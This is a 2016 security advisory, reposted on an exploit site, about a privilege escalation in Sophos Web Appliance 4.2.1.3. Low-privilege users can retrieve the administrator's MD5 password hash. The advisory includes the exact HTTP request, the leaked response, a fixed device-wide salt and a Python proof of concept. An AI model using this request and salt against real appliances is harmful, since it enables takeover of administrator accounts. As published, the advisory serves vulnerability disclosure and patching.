Sophos Web Appliance 4.2.1.3 Privilege Escalation Vulnerability

🗓️ 04 Nov 2016 00:00:00Reported by Matthew BerginType
zdt🔗 0day.today👁 34 Views
Sophos Web Appliance 4.2.1.3 has a privilege escalation vulnerability via MD5 hash exposure.
Title: Sophos Web Appliance Privilege Escalation
Advisory ID: KL-001-2016-008
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-008.txt


1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Apppliance
     Affected Version: v4.2.1.3
     Platform: Embedded Linux
     CWE Classification: CWE-522: Insufficiently Protected Credentials,
                         CWE-261: Weak Cryptography for Passwords
     Impact: Privilege Escalation
     Attack vector: HTTP

2. Vulnerability Description

     An unprivileged user can obtain an MD5 hash of the administrator
     password which can then be used to discover the plain-text password.

3. Technical Description

     A user with the privileges: Helpdesk, Policy, Reporting,
     or User Activity can obtain an MD5 hash for the Full Access
     Administrator account. A valid session identifier is required
     and is delivered through the STYLE parameter.

     GET /index.php?c=change_password&STYLE=7151e50b0389755717510f218b1af00c
HTTP/1.1
     Host: [redacted]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
Gecko/20100101 Firefox/46.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     Connection: close

     HTTP/1.1 200 OK
     Date: Tue, 10 May 2016 00:36:43 GMT
     Server: Apache
     X-UA-Compatible: IE=7
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
pre-check=0
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 8798

     ...
     {"currentUser":"test","globalUser":false,"swa_title":"Change
Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default
Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default
Administrator Account\",\"admin\":true,\"roles\":\"Full Access
Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["<a
class=\"button \" id=\"lnk_cancel\" href=\"#\" onclick=\"this.blur(); return
false;\">\n    <span class=\"buttonLabel\">Cancel<\/span>\n<\/a>","<a
class=\"button \" id=\"lnk_save\" href=\"#\" onclick=\"this.blur(); return
false;\">\n    <span
class=\"buttonLabel\">Save<\/span>\n<\/a>"],"navigation_left":[],"status_processing":"Submitting...","status_password_dont_match":"Password
mismatch","status_invalid_password":"Invalid
password","status_current_password_invalid":"Current password
invalid","uiStatusMessages":{"status_processing":"Submitting...","status_password_dont_match":"Password
mismatch","status_invalid_password":"Invalid
password","status_current_password_invalid":"Current password
invalid"},"rba":{"reports":true,"search":true,"configuration":true,"system_status":false,"help_support":true,"editable":true,"current_user":"test","globalUser":false,"admin_role":false}
     ...

     A fixed salt is apparently used for all such devices: P3T3R [email protected]

     The admin MD5 hash in this case is: f98d0973dffdc3a29ee67167c15b882e

4. Mitigation and Remediation Recommendation

     The vendor has issued a fix for this vulnerability in Version
     4.3 of SWA. Release notes available at:

     http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos.
     2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
     2016.09.28 - KoreLogic requests status update.
     2016.09.28 - Sophos informs KoreLogic that an update including a fix
                  for this vulnerability will be available near the end
                  of October.
     2016.10.13 - Sophos informs KoreLogic that the update was released to a
                  limited customer base and is expected to be distributed
                  at-large over the following week.
     2016.11.03 - Public disclosure.

7. Proof of Concept

     >>> from hashlib import md5
     >>> md5('P3T3R [email protected]').hexdigest()
     'f98d0973dffdc3a29ee67167c15b882e'

#  0day.today [2018-03-13]  #
04 Nov 2016 00:00Current
7High risk
Vulners AI Score7